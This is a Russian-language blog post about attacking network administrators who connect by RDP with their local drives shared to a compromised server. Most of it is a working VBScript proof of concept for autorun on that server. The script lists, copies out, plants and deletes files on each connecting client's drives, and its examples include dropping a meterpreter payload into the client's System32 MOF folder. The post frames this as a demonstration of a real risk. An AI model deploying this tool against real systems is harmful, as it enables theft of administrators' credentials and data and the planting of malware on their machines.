Охота на администраторов сети

Рабочая станция любого среднестатистического повелителя сети (или повелителя отдельной ее части) является наиболее ценным и лакомым ресурсом для атакующего. Тут вам и резервные копии конфигураций продуктивных систем, и красочная топология сети с указанием наиболее ценных ресурсов, и, разумеется, заветные логины, ключики и пароли. Прям подарочная не зашифрованная коробка, перевязанная бантиком 8)) Если добавить сюда еще и "скромные" разрешающие правила фильтрации трафика на границах сетей с козырных ip адресов админов, тогда можно понять насколько сильно атакующий жаждет заполучить доступ к этим системам. Это отличный плацдарм для планирования и развития атаки!

Но как же добраться до компутера админа и вместе с тем заполучить ключи от всех дверей? Существует довольно много способов. Об одном из них речь пойдет в данной публикации.

Представьте себе ситуацию, когда большинство попыток реализации атак не увенчались успехом. При этом в распоряжении атакующего оказались лишь несколько тестовых автономных серверов без каких либо ценностей на них (пароли дефолты и т.п.), пускай в т.ч., расположенные в изолированном сегменте за семью файрволами и пятью айпиэсами. Что из этого можно выжать?

name='more'>
Когда речь заходит про удаленный доступ к машинкам на платформе windows, то чаще всего прибегают к встроенному функционалу операционной системы - использованию протокола RDP. А когда возникает потребность в передаче файлов небольшого размера, то разумеется задействуют следующую функцию rdp-клиента:

(прим., в более поздних реализациях клиента была добавлена возможность выбора конкретных дисков для подключения)

Тут-то и кроется опасность, о которой предупреждает сам rdp-клиент. Тем не менее все администраторы зачастую не обращают на это уже изрядно поднадоевшее сообщение безопасности никакого внимания (так ведь действительно проще, удобнее и быстрее!).

Теперь я думаю всем стало понятно про предлагаемый мною сценарий атаки. Соглашаясь на подключение к недоверенному rdp-серверу с торчащими дисками C: можно лишиться чувствительных данных, подцепить meterpreter (или чего еще более живучее), поймать del * /f /s /q.

В качестве демонстрации этого привожу proof-of-concept, который будучи заброшенный в автозагрузку при подключении терминальных пользователей на скомпрометированном сервере позволяет работать с локальными и сетевыми дисками клиента.

Настраиваемые переменные
tFolder - задает путь к рабочему каталогу на терминальном сервере
sleep - задает время задержки между обработкой новых команд

Поддерживаемые команды

Чтобы отправить команду, необходимо воспользоваться файлом "cmd.txt". Каждая строка в этом файле воспринимается, как отдельная команда, что позволяет задавать одновременно более одной команды. Для каждого терминального клиента создается свой уникальный каталог по имени rdp-подключения (RDP-Tcp#<порядковый номер>) и свой "cmd.txt" файл соответственно. Копирование и загрузка файлов производится для каждого терминального клиента в его индивидуальном каталоге.

ls:<путь до каталога>
Листинг файлов и директорий. Пример:
ls:TSCLIENTC
...
>ls TSCLIENTC
<DIR>Documents and Settings
<DIR>Program Files
<DIR>RECYCLER
<DIR>System Volume Information
<DIR>Temp
<DIR>WINDOWS
<DIR>wmpub
AUTOEXEC.BAT
boot.ini
bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
ntldr
pagefile.sys
...

ll:<путь до каталога>
Рекурсивный листинг файлов и директорий. Пример:
ll:TSCLIENTCTemp
...
>ll TSCLIENTCTemp
<DIR>RDP-Tcp#2
<DIR>RDP-Tcp#3

>ls tsclientcTempRDP-Tcp#2
cmd.txt
list.txt

>ls tsclientcTempRDP-Tcp#3
cmd.txt
list.txt
...

get:<путь до каталога или файла>
Копирует файл или каталог в рабочую директорию из которой выполнялась команда. Пример:
get:TSCLIENTCWindowsrepair

put:<имя файла для отправки>:<путь до каталога назначения>
Копирует файл, расположенный в рабочей директории, из которой выполнялась команда в каталог назначения. Пример:
put:meterpreter.vbs:TSCLIENTCWindowsSystem32wbemmof

rm:<путь до удаляемого файла>
Удаляет указанный файл. Пример:
rm:TSCLIENTCmyfile

On Error resume next  tFolder = "C:Temp" sleep = 5000  ' - - - -  Set wshShell = CreateObject( "WScript.Shell" ) Set fso = CreateObject("Scripting.FileSystemObject")  rdpsession = wshShell.ExpandEnvironmentStrings("%SESSIONNAME%") username = wshShell.ExpandEnvironmentStrings("%USERNAME%")  tFolder = tFolder & "" & rdpsession  If Not fso.FolderExists(tFolder) Then  fso.CreateFolder tFolder End If  Set file = fso.CreateTextFile(tFolder&"list.txt", True) Set cmd = fso.CreateTextFile(tFolder&"cmd.txt", True) cmd.Close file.WriteLine("Username: " & username) file.WriteLine("")  With WScript.CreateObject("WScript.Network").EnumNetworkDrives()  For i = 0 to .Count - 1 Step 2   UNCpath = .Item(i + 1)   file.WriteLine("UNC path: " & UNCpath)   If UNCpath <> "" Then    ShowFiles UNCpath,0    file.WriteLine("")   End If  Next End With  do  Wscript.sleep(sleep)  set objFile = fso.GetFile(tFolder&"cmd.txt")  If objFile.Size > 0 Then   Set dict = CreateObject("Scripting.Dictionary")   Set cmd = fso.OpenTextFile (tFolder&"cmd.txt", 1)   row = 0   Do Until cmd.AtEndOfStream    line = cmd.Readline    dict.Add row, line    row = row + 1   Loop  cmd.Close   For Each line in dict.Items   command = UCase(mid(line,1,3))   If command = "LS:" Then    lspath = mid(line,4)    file.WriteLine(">ls " & lspath)    ShowFiles lspath,0    file.WriteLine("")   ElseIf command = "LL:" Then    lspath = mid(line,4)    file.WriteLine(">ll " & lspath)    ShowFiles lspath,1    file.WriteLine("")   ElseIf command = "GET" Then    getpath = mid(line,5)    If fso.FileExists(getpath) Then     fso.CopyFile getpath, tFolder&""    ElseIf fso.FolderExists(getpath) Then     fso.CopyFolder getpath, tFolder&""    End If    file.WriteLine(">get "&getpath)    file.WriteLine("")    ElseIf command = "PUT" Then    t1 = mid(line,5)    s1 = InStr(1,t1,":")    filein = mid(t1,1,s1-1)    dirout = mid(t1,s1+1)    If fso.FileExists(tFolder&""&filein) AND fso.FolderExists(dirout) Then     fso.CopyFile tFolder&""&filein, dirout&""    End If    file.WriteLine(">put "&tFolder&""&filein&" "&dirout&"")    file.WriteLine("")    ElseIf command = "RM:" Then    rmpath = mid(line,4)    If fso.FileExists(rmpath) Then     fso.DeleteFile rmpath    End If    file.WriteLine(">rm "&rmpath)    file.WriteLine("")    End If  Next   Set cmd = fso.CreateTextFile(tFolder&"cmd.txt", True)  cmd.Close   End If loop  file.Close  Sub ShowFiles(Folder,ll)  On Error resume next  Dim fso, ObjFolder, ObjOutFile, ObjSubFolders, ObjSubFolder, ObjFiles   Set fso = CreateObject("Scripting.FileSystemObject")  Set ObjFolder = fso.GetFolder(Folder)  Set ObjSubFolders = ObjFolder.SubFolders  Set ObjFiles = ObjFolder.Files   For Each ObjSubFolder In ObjSubFolders   file.WriteLine("<dir>" & Chr(9) & ObjSubFolder.Name)  Next   For Each ObjFile In ObjFiles   file.WriteLine(ObjFile.Name)  Next   If ll <> 0 Then   For Each ObjSubFolder In ObjSubFolders    file.WriteLine("")    file.WriteLine(">ls " & ObjSubFolder.Path)    ShowFiles ObjSubFolder.Path,1   Next  End If  End Sub

Охота на администраторов сети

Цифровые следы - ваша слабость, и хакеры это знают.

Dmitriy Evteev

Охота на администраторов сети

Цифровые следы - ваша слабость, и хакеры это знают.

Dmitriy Evteev

Подпишитесь на email рассылку